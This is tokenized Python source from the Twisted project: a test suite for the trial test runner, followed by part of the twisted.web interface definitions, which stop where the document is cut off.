<s> import StringIO , os , sys <EOL> from zope . interface import implements <EOL> from zope . interface . verify import verifyObject <EOL> from twisted . trial . itrial import IReporter , ITestCase <EOL> from twisted . trial import unittest , runner , reporter , util <EOL> from twisted . python import failure , log , reflect , filepath <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . scripts import trial <EOL> from twisted . plugins import twisted_trial <EOL> from twisted import plugin <EOL> from twisted . internet import defer <EOL> pyunit = __import__ ( '<STR_LIT>' ) <EOL> class CapturingDebugger ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _calls = [ ] <EOL> def runcall ( self , * args , ** kwargs ) : <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> args [ <NUM_LIT:0> ] ( * args [ <NUM_LIT:1> : ] , ** kwargs ) <EOL> class CapturingReporter ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IReporter ) <EOL> stream = None <EOL> tbformat = None <EOL> args = None <EOL> separator = None <EOL> testsRun = None <EOL> def __init__ ( self , stream = None , tbformat = None , rterrors = None , <EOL> publisher = None ) : <EOL> """<STR_LIT>""" <EOL> self . _calls = [ ] <EOL> self . shouldStop = False <EOL> self . _stream = stream <EOL> self . _tbformat = tbformat <EOL> self . _rterrors = rterrors <EOL> self . _publisher = publisher <EOL> def startTest ( self , method ) : <EOL> """<STR_LIT>""" <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def stopTest ( self , method ) : <EOL> """<STR_LIT>""" <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def cleanupErrors ( self , errs ) : <EOL> """<STR_LIT>""" <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def addSuccess ( self , test ) : <EOL> self . _calls . append ( '<STR_LIT>' ) <EOL> def done ( self ) : <EOL> """<STR_LIT>""" <EOL> class TrialRunnerTestsMixin : <EOL> """<STR_LIT>""" <EOL> def tearDown ( self ) : <EOL> self . runner . _tearDownLogFile ( ) <EOL> def test_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> def _getObservers ( self ) : <EOL> return log . theLogPublisher . observers <EOL> def test_addObservers ( self ) : <EOL> """<STR_LIT>""" <EOL> originalCount = len ( self . _getObservers ( ) ) <EOL> self . runner . run ( self . test ) <EOL> newCount = len ( self . _getObservers ( ) ) <EOL> self . assertEqual ( newCount , originalCount ) <EOL> def test_logFileAlwaysActive ( self ) : <EOL> """<STR_LIT>""" <EOL> oldSetUpLogFile = self . runner . _setUpLogFile <EOL> l = [ ] <EOL> def setUpLogFile ( ) : <EOL> oldSetUpLogFile ( ) <EOL> l . append ( self . runner . _logFileObserver ) <EOL> self . runner . _setUpLogFile = setUpLogFile <EOL> self . runner . run ( self . test ) <EOL> self . runner . run ( self . test ) <EOL> self . assertEqual ( len ( l ) , <NUM_LIT:2> ) <EOL> self . failIf ( l [ <NUM_LIT:0> ] is l [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> def test_logFileGetsClosed ( self ) : <EOL> """<STR_LIT>""" <EOL> oldSetUpLogFile = self . runner . _setUpLogFile <EOL> l = [ ] <EOL> def setUpLogFile ( ) : <EOL> oldSetUpLogFile ( ) <EOL> l . append ( self . runner . _logFileObject ) <EOL> self . runner . _setUpLogFile = setUpLogFile <EOL> self . runner . run ( self . test ) <EOL> self . assertEqual ( len ( l ) , <NUM_LIT:1> ) <EOL> self . failUnless ( l [ <NUM_LIT:0> ] . closed ) <EOL> class TestTrialRunner ( TrialRunnerTestsMixin , unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( CapturingReporter , stream = self . stream ) <EOL> self . test = TestTrialRunner ( '<STR_LIT>' ) <EOL> def test_publisher ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . _makeResult ( ) <EOL> self . assertIdentical ( result . _publisher , log ) <EOL> class TrialRunnerWithUncleanWarningsReporter ( TrialRunnerTestsMixin , <EOL> unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( CapturingReporter , stream = self . stream , <EOL> uncleanWarnings = True ) <EOL> self . test = TestTrialRunner ( '<STR_LIT>' ) <EOL> class DryRunMixin ( object ) : <EOL> suppress = [ util . suppress ( <EOL> category = DeprecationWarning , <EOL> message = "<STR_LIT>" ) ] <EOL> def setUp ( self ) : <EOL> self . log = [ ] <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( CapturingReporter , <EOL> runner . TrialRunner . DRY_RUN , <EOL> stream = self . stream ) <EOL> self . makeTestFixtures ( ) <EOL> def makeTestFixtures ( self ) : <EOL> """<STR_LIT>""" <EOL> def test_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . run ( runner . TestSuite ( ) ) <EOL> self . assertEqual ( result . _calls , [ ] ) <EOL> def test_singleCaseReporting ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . run ( self . test ) <EOL> self . assertEqual ( result . _calls , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_testsNotRun ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . run ( self . test ) <EOL> self . assertEqual ( self . log , [ ] ) <EOL> class DryRunTest ( DryRunMixin , unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def makeTestFixtures ( self ) : <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo ( test ) : <EOL> self . log . append ( '<STR_LIT>' ) <EOL> self . test = MockTest ( '<STR_LIT>' ) <EOL> self . suite = runner . TestSuite ( ) <EOL> class PyUnitDryRunTest ( DryRunMixin , unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def makeTestFixtures ( self ) : <EOL> class PyunitCase ( pyunit . TestCase ) : <EOL> def test_foo ( self ) : <EOL> pass <EOL> self . test = PyunitCase ( '<STR_LIT>' ) <EOL> self . suite = pyunit . TestSuite ( ) <EOL> class TestRunner ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . config = trial . Options ( ) <EOL> parts = reflect . qual ( CapturingReporter ) . split ( '<STR_LIT:.>' ) <EOL> package = '<STR_LIT:.>' . join ( parts [ : - <NUM_LIT:1> ] ) <EOL> klass = parts [ - <NUM_LIT:1> ] <EOL> plugins = [ twisted_trial . _Reporter ( <EOL> "<STR_LIT>" , <EOL> package , <EOL> description = "<STR_LIT>" , <EOL> longOpt = "<STR_LIT>" , <EOL> shortOpt = None , <EOL> klass = klass ) ] <EOL> def getPlugins ( iface , * a , ** kw ) : <EOL> self . assertEqual ( iface , IReporter ) <EOL> return plugins + list ( self . original ( iface , * a , ** kw ) ) <EOL> self . original = plugin . getPlugins <EOL> plugin . getPlugins = getPlugins <EOL> self . standardReport = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def tearDown ( self ) : <EOL> plugin . getPlugins = self . original <EOL> def parseOptions ( self , args ) : <EOL> self . config . parseOptions ( args ) <EOL> def getRunner ( self ) : <EOL> r = trial . _makeRunner ( self . config ) <EOL> r . stream = StringIO . StringIO ( ) <EOL> self . addCleanup ( r . _tearDownLogFile ) <EOL> r . _log = log . LogPublisher ( ) <EOL> return r <EOL> def test_runner_can_get_reporter ( self ) : <EOL> self . parseOptions ( [ ] ) <EOL> result = self . config [ '<STR_LIT>' ] <EOL> runner = self . getRunner ( ) <EOL> self . assertEqual ( result , runner . _makeResult ( ) . __class__ ) <EOL> def test_runner_get_result ( self ) : <EOL> self . parseOptions ( [ ] ) <EOL> runner = self . getRunner ( ) <EOL> result = runner . _makeResult ( ) <EOL> self . assertEqual ( result . __class__ , self . config [ '<STR_LIT>' ] ) <EOL> def test_uncleanWarningsOffByDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ ] ) <EOL> runner = self . getRunner ( ) <EOL> self . assertNotIsInstance ( runner . _makeResult ( ) , <EOL> reporter . UncleanWarningsReporterWrapper ) <EOL> def test_getsUncleanWarnings ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ '<STR_LIT>' ] ) <EOL> runner = self . getRunner ( ) <EOL> self . assertIsInstance ( runner . _makeResult ( ) , <EOL> reporter . UncleanWarningsReporterWrapper ) <EOL> def test_runner_working_directory ( self ) : <EOL> self . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> runner = self . getRunner ( ) <EOL> self . assertEqual ( runner . workingDirectory , '<STR_LIT>' ) <EOL> def test_concurrentImplicitWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ ] ) <EOL> self . addCleanup ( os . chdir , os . getcwd ( ) ) <EOL> runDirectory = FilePath ( self . mktemp ( ) ) <EOL> runDirectory . makedirs ( ) <EOL> os . chdir ( runDirectory . path ) <EOL> firstRunner = self . getRunner ( ) <EOL> secondRunner = self . getRunner ( ) <EOL> where = { } <EOL> class ConcurrentCase ( unittest . TestCase ) : <EOL> def test_first ( self ) : <EOL> """<STR_LIT>""" <EOL> where [ '<STR_LIT>' ] = subsequentDirectory = os . getcwd ( ) <EOL> os . chdir ( runDirectory . path ) <EOL> self . addCleanup ( os . chdir , subsequentDirectory ) <EOL> secondRunner . run ( ConcurrentCase ( '<STR_LIT>' ) ) <EOL> def test_second ( self ) : <EOL> """<STR_LIT>""" <EOL> where [ '<STR_LIT>' ] = os . getcwd ( ) <EOL> result = firstRunner . run ( ConcurrentCase ( '<STR_LIT>' ) ) <EOL> bad = result . errors + result . failures <EOL> if bad : <EOL> self . fail ( bad [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( <EOL> where , { <EOL> '<STR_LIT>' : runDirectory . child ( '<STR_LIT>' ) . path , <EOL> '<STR_LIT>' : runDirectory . child ( '<STR_LIT>' ) . path } ) <EOL> def test_concurrentExplicitWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ '<STR_LIT>' , os . path . abspath ( self . mktemp ( ) ) ] ) <EOL> initialDirectory = os . getcwd ( ) <EOL> self . addCleanup ( os . chdir , initialDirectory ) <EOL> firstRunner = self . getRunner ( ) <EOL> secondRunner = self . getRunner ( ) <EOL> class ConcurrentCase ( unittest . TestCase ) : <EOL> def test_concurrent ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> util . _WorkingDirectoryBusy , <EOL> secondRunner . run , ConcurrentCase ( '<STR_LIT>' ) ) <EOL> def test_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> self . fail ( "<STR_LIT>" ) <EOL> result = firstRunner . run ( ConcurrentCase ( '<STR_LIT>' ) ) <EOL> bad = result . errors + result . failures <EOL> if bad : <EOL> self . fail ( bad [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_runner_normal ( self ) : <EOL> self . parseOptions ( [ '<STR_LIT>' , self . mktemp ( ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> my_runner = self . getRunner ( ) <EOL> loader = runner . TestLoader ( ) <EOL> suite = loader . loadByName ( '<STR_LIT>' , True ) <EOL> result = my_runner . run ( suite ) <EOL> self . assertEqual ( self . standardReport , result . _calls ) <EOL> def test_runner_debug ( self ) : <EOL> self . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> my_runner = self . getRunner ( ) <EOL> debugger = CapturingDebugger ( ) <EOL> def get_debugger ( ) : <EOL> return debugger <EOL> my_runner . _getDebugger = get_debugger <EOL> loader = runner . TestLoader ( ) <EOL> suite = loader . loadByName ( '<STR_LIT>' , True ) <EOL> result = my_runner . run ( suite ) <EOL> self . assertEqual ( self . standardReport , result . _calls ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , debugger . _calls ) <EOL> class RemoveSafelyTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_removeSafelyNoTrialMarker ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = self . mktemp ( ) <EOL> os . mkdir ( directory ) <EOL> dirPath = filepath . FilePath ( directory ) <EOL> self . assertRaises ( util . _NoTrialMarker , util . _removeSafely , dirPath ) <EOL> def test_removeSafelyRemoveFailsMoveSucceeds ( self ) : <EOL> """<STR_LIT>""" <EOL> def dummyRemove ( ) : <EOL> """<STR_LIT>""" <EOL> raise OSError ( ) <EOL> out = StringIO . StringIO ( ) <EOL> self . patch ( sys , '<STR_LIT>' , out ) <EOL> directory = self . mktemp ( ) <EOL> os . mkdir ( directory ) <EOL> dirPath = filepath . FilePath ( directory ) <EOL> dirPath . child ( '<STR_LIT>' ) . touch ( ) <EOL> dirPath . remove = dummyRemove <EOL> util . _removeSafely ( dirPath ) <EOL> self . assertIn ( "<STR_LIT>" , out . getvalue ( ) ) <EOL> def test_removeSafelyRemoveFailsMoveFails ( self ) : <EOL> """<STR_LIT>""" <EOL> def dummyRemove ( ) : <EOL> """<STR_LIT>""" <EOL> raise OSError ( "<STR_LIT>" ) <EOL> def dummyMoveTo ( path ) : <EOL> """<STR_LIT>""" <EOL> raise OSError ( "<STR_LIT>" ) <EOL> out = StringIO . StringIO ( ) <EOL> self . patch ( sys , '<STR_LIT>' , out ) <EOL> directory = self . mktemp ( ) <EOL> os . mkdir ( directory ) <EOL> dirPath = filepath . FilePath ( directory ) <EOL> dirPath . child ( '<STR_LIT>' ) . touch ( ) <EOL> dirPath . remove = dummyRemove <EOL> dirPath . moveTo = dummyMoveTo <EOL> error = self . assertRaises ( OSError , util . _removeSafely , dirPath ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , out . getvalue ( ) ) <EOL> class TestTrialSuite ( unittest . TestCase ) : <EOL> def test_imports ( self ) : <EOL> from twisted . trial . runner import TrialSuite <EOL> class TestUntilFailure ( unittest . TestCase ) : <EOL> class FailAfter ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> count = [ ] <EOL> def test_foo ( self ) : <EOL> self . count . append ( None ) <EOL> if len ( self . count ) == <NUM_LIT:3> : <EOL> self . fail ( '<STR_LIT>' ) <EOL> def setUp ( self ) : <EOL> TestUntilFailure . FailAfter . count = [ ] <EOL> self . test = TestUntilFailure . FailAfter ( '<STR_LIT>' ) <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( reporter . Reporter , stream = self . stream ) <EOL> def test_runUntilFailure ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . runUntilFailure ( self . test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . failIf ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( self . _getFailures ( result ) , <NUM_LIT:1> ) <EOL> def _getFailures ( self , result ) : <EOL> """<STR_LIT>""" <EOL> return len ( result . failures ) <EOL> def test_runUntilFailureDecorate ( self ) : <EOL> """<STR_LIT>""" <EOL> decorated = [ ] <EOL> def decorate ( test , interface ) : <EOL> decorated . append ( ( test , interface ) ) <EOL> return test <EOL> self . patch ( unittest , "<STR_LIT>" , decorate ) <EOL> result = self . runner . runUntilFailure ( self . test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( decorated ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( decorated , [ ( self . test , ITestCase ) ] ) <EOL> def test_runUntilFailureForceGCDecorate ( self ) : <EOL> """<STR_LIT>""" <EOL> decorated = [ ] <EOL> def decorate ( test , interface ) : <EOL> decorated . append ( ( test , interface ) ) <EOL> return test <EOL> self . patch ( unittest , "<STR_LIT>" , decorate ) <EOL> self . runner . _forceGarbageCollection = True <EOL> result = self . runner . runUntilFailure ( self . test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( decorated ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( decorated , <EOL> [ ( self . test , ITestCase ) , <EOL> ( self . test , unittest . _ForceGarbageCollectionDecorator ) ] ) <EOL> class UncleanUntilFailureTests ( TestUntilFailure ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> TestUntilFailure . setUp ( self ) <EOL> self . runner = runner . TrialRunner ( reporter . Reporter , stream = self . stream , <EOL> uncleanWarnings = True ) <EOL> def _getFailures ( self , result ) : <EOL> """<STR_LIT>""" <EOL> return len ( result . _originalReporter . failures ) <EOL> class BreakingSuite ( runner . TestSuite ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , result ) : <EOL> try : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> except RuntimeError : <EOL> log . err ( failure . Failure ( ) ) <EOL> class TestLoggedErrors ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def tearDown ( self ) : <EOL> self . flushLoggedErrors ( RuntimeError ) <EOL> def test_construct ( self ) : <EOL> """<STR_LIT>""" <EOL> suite = runner . LoggedSuite ( ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:0> ) <EOL> def test_capturesError ( self ) : <EOL> """<STR_LIT>""" <EOL> result = reporter . TestResult ( ) <EOL> suite = runner . LoggedSuite ( [ BreakingSuite ( ) ] ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . id ( ) , runner . NOT_IN_TEST ) <EOL> self . failUnless ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . check ( RuntimeError ) ) <EOL> class TestTestHolder ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . description = "<STR_LIT:description>" <EOL> self . holder = runner . TestHolder ( self . description ) <EOL> def test_holder ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . holder . id ( ) , self . description ) <EOL> self . assertEqual ( self . holder . shortDescription ( ) , self . description ) <EOL> def test_holderImplementsITestCase ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . holder , ITestCase ( self . holder ) ) <EOL> self . assertTrue ( <EOL> verifyObject ( ITestCase , self . holder ) , <EOL> "<STR_LIT>" <EOL> % ( self . holder , ITestCase ) ) <EOL> def test_runsWithStandardResult ( self ) : <EOL> """<STR_LIT>""" <EOL> result = pyunit . TestResult ( ) <EOL> self . holder . run ( result ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , result . testsRun ) <EOL> class ErrorHolderTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> exceptionForTests = ZeroDivisionError ( '<STR_LIT>' ) <EOL> class TestResultStub ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . errors = [ ] <EOL> def startTest ( self , test ) : <EOL> pass <EOL> def stopTest ( self , test ) : <EOL> pass <EOL> def addError ( self , test , error ) : <EOL> self . errors . append ( ( test , error ) ) <EOL> def test_runsWithStandardResult ( self ) : <EOL> """<STR_LIT>""" <EOL> result = pyunit . TestResult ( ) <EOL> self . holder . run ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , result . testsRun ) <EOL> def test_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . holder . run ( self . result ) <EOL> self . assertEqual ( <EOL> self . result . errors , <EOL> [ ( self . holder , ( self . error . type , self . error . value , self . error . tb ) ) ] ) <EOL> def test_call ( self ) : <EOL> """<STR_LIT>""" <EOL> self . holder ( self . result ) <EOL> self . assertEqual ( <EOL> self . result . errors , <EOL> [ ( self . holder , ( self . error . type , self . error . value , self . error . tb ) ) ] ) <EOL> def test_countTestCases ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . holder . countTestCases ( ) , <NUM_LIT:0> ) <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( repr ( self . holder ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class FailureHoldingErrorHolderTests ( ErrorHolderTestsMixin , TestTestHolder ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . description = "<STR_LIT:description>" <EOL> try : <EOL> raise self . exceptionForTests <EOL> except ZeroDivisionError : <EOL> self . error = failure . Failure ( ) <EOL> self . holder = runner . ErrorHolder ( self . description , self . error ) <EOL> self . result = self . TestResultStub ( ) <EOL> class ExcInfoHoldingErrorHolderTests ( ErrorHolderTestsMixin , TestTestHolder ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . description = "<STR_LIT:description>" <EOL> try : <EOL> raise self . exceptionForTests <EOL> except ZeroDivisionError : <EOL> exceptionInfo = sys . exc_info ( ) <EOL> self . error = failure . Failure ( ) <EOL> self . holder = runner . ErrorHolder ( self . description , exceptionInfo ) <EOL> self . result = self . TestResultStub ( ) <EOL> class TestMalformedMethod ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> class ContainMalformed ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_foo ( self , blah ) : <EOL> pass <EOL> def test_bar ( ) : <EOL> pass <EOL> test_spam = defer . deferredGenerator ( test_bar ) <EOL> def _test ( self , method ) : <EOL> """<STR_LIT>""" <EOL> stream = StringIO . StringIO ( ) <EOL> trialRunner = runner . TrialRunner ( reporter . Reporter , stream = stream ) <EOL> test = TestMalformedMethod . ContainMalformed ( method ) <EOL> result = trialRunner . run ( test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . failIf ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> def test_extraArg ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test ( '<STR_LIT>' ) <EOL> def test_noArg ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test ( '<STR_LIT>' ) <EOL> def test_decorated ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test ( '<STR_LIT>' ) <EOL> class DestructiveTestSuiteTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_basic ( self ) : <EOL> """<STR_LIT>""" <EOL> called = [ ] <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo ( test ) : <EOL> called . append ( True ) <EOL> test = MockTest ( '<STR_LIT>' ) <EOL> result = reporter . TestResult ( ) <EOL> suite = runner . DestructiveTestSuite ( [ test ] ) <EOL> self . assertEqual ( called , [ ] ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( called , [ True ] ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:0> ) <EOL> def test_shouldStop ( self ) : <EOL> """<STR_LIT>""" <EOL> called = [ ] <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo1 ( test ) : <EOL> called . append ( <NUM_LIT:1> ) <EOL> def test_foo2 ( test ) : <EOL> raise KeyboardInterrupt ( ) <EOL> def test_foo3 ( test ) : <EOL> called . append ( <NUM_LIT:2> ) <EOL> result = reporter . TestResult ( ) <EOL> loader = runner . TestLoader ( ) <EOL> loader . suiteFactory = runner . DestructiveTestSuite <EOL> suite = loader . loadClass ( MockTest ) <EOL> self . assertEqual ( called , [ ] ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( called , [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:1> ) <EOL> def test_cleanup ( self ) : <EOL> """<STR_LIT>""" <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo ( test ) : <EOL> pass <EOL> test = MockTest ( '<STR_LIT>' ) <EOL> result = reporter . TestResult ( ) <EOL> suite = runner . DestructiveTestSuite ( [ test ] ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:1> ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:0> ) <EOL> class TestRunnerDeprecation ( unittest . TestCase ) : <EOL> class FakeReporter ( reporter . Reporter ) : <EOL> """<STR_LIT>""" <EOL> done = None <EOL> separator = None <EOL> stream = None <EOL> def printErrors ( self , * args ) : <EOL> pass <EOL> def printSummary ( self , * args ) : <EOL> pass <EOL> def write ( self , * args ) : <EOL> pass <EOL> def writeln ( self , * args ) : <EOL> pass <EOL> def test_reporterDeprecations ( self ) : <EOL> """<STR_LIT>""" <EOL> trialRunner = runner . TrialRunner ( None ) <EOL> result = self . FakeReporter ( ) <EOL> trialRunner . _makeResult = lambda : result <EOL> def f ( ) : <EOL> trialRunner . run ( pyunit . TestCase ( '<STR_LIT:id>' ) ) <EOL> self . assertWarns ( <EOL> DeprecationWarning , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % reflect . qual ( result . __class__ ) , <EOL> __file__ , f ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import Interface , Attribute <EOL> from twisted . internet . interfaces import IPushProducer <EOL> from twisted . cred . credentials import IUsernameDigestHash <EOL> class IRequest ( Interface ) : <EOL> """<STR_LIT>""" <EOL> method = Attribute ( "<STR_LIT>" ) <EOL> uri = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> path = Attribute ( <EOL> "<STR_LIT>" ) <EOL> args = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> received_headers = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> requestHeaders = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> headers = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> responseHeaders = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def getHeader ( key ) : <EOL> """<STR_LIT>""" <EOL> def getCookie ( key ) : <EOL> """<STR_LIT>""" <EOL> def getAllHeaders ( ) : <EOL> """<STR_LIT>""" <EOL> def getRequestHostname ( ) : <EOL> """<STR_LIT>""" <EOL> def getHost ( ) : <EOL> """<STR_LIT>""" <EOL> def getClientIP ( ) : <EOL> """<STR_LIT>""" <EOL> def getClient ( ) : <EOL> """<STR_LIT>""" <EOL> def getUser ( ) : <EOL> """<STR_LIT>""" <EOL> def getPassword ( ) : <EOL> """<STR_LIT>""" <EOL> def isSecure ( ) : <EOL> """<STR_LIT>""" <EOL> def getSession ( sessionInterface = None ) : <EOL> """<STR_LIT>""" <EOL> def URLPath ( ) : <EOL> """<STR_LIT>""" <EOL> def prePathURL ( ) : <EOL> """<STR_LIT>""" <EOL> def rememberRootURL ( ) : <EOL> """<STR_LIT>""" <EOL> def getRootURL ( ) : <EOL> """<STR_LIT>""" <EOL> def finish ( ) : <EOL> """<STR_LIT>""" <EOL> def write ( data ) : <EOL> """<STR_LIT>""" <EOL> def addCookie ( k , v , expires = None , domain = None , path = None , max_age = None , comment = None , secure = None ) : <EOL> """<STR_LIT>""" <EOL> def setResponseCode ( code , message = None ) : <EOL> """<STR_LIT>""" <EOL> def setHeader ( k , v ) : <EOL> """<STR_LIT>""" <EOL> def redirect ( url ) : <EOL> """<STR_LIT>""" <EOL> def setLastModified ( when ) : <EOL> """<STR_LIT>""" <EOL> def setETag ( etag ) : <EOL> """<STR_LIT>""" <EOL> def setHost ( host , port , ssl = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> class ICredentialFactory ( Interface ) : <EOL> """<STR_LIT>""" <EOL> scheme = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def getChallenge ( request ) : <EOL> """<STR_LIT>""" <EOL> def decode ( response , request ) : <EOL> """<STR_LIT>""" <EOL> class IBodyProducer ( IPushProducer ) : <EOL> """<STR_LIT>""" <EOL> length = Attribute ( <EOL> """<STR_LIT>""" ) <EOL> def startProducing ( consumer ) : <EOL> """<STR_LIT>""" <EOL> def stopProducing ( ) : <EOL> """<STR_LIT>""" <EOL> class IRenderable ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def lookupRenderMethod ( name ) : <EOL> """<STR_LIT>""" <EOL> def render ( request ) : <EOL> """<STR_LIT>""" <EOL> class ITemplateLoader ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def load ( ) : <EOL> """<STR_LIT>""" <EOL> class IResponse ( Interface ) : <EOL> """<STR_LIT>""" <EOL> version = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> code = Attribute ( "<STR_LIT>" ) <EOL> phrase = Attribute ( <EOL> "<STR_LIT>" ) <EOL> headers = Attribute ( "<STR_LIT>" ) <EOL> length = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> 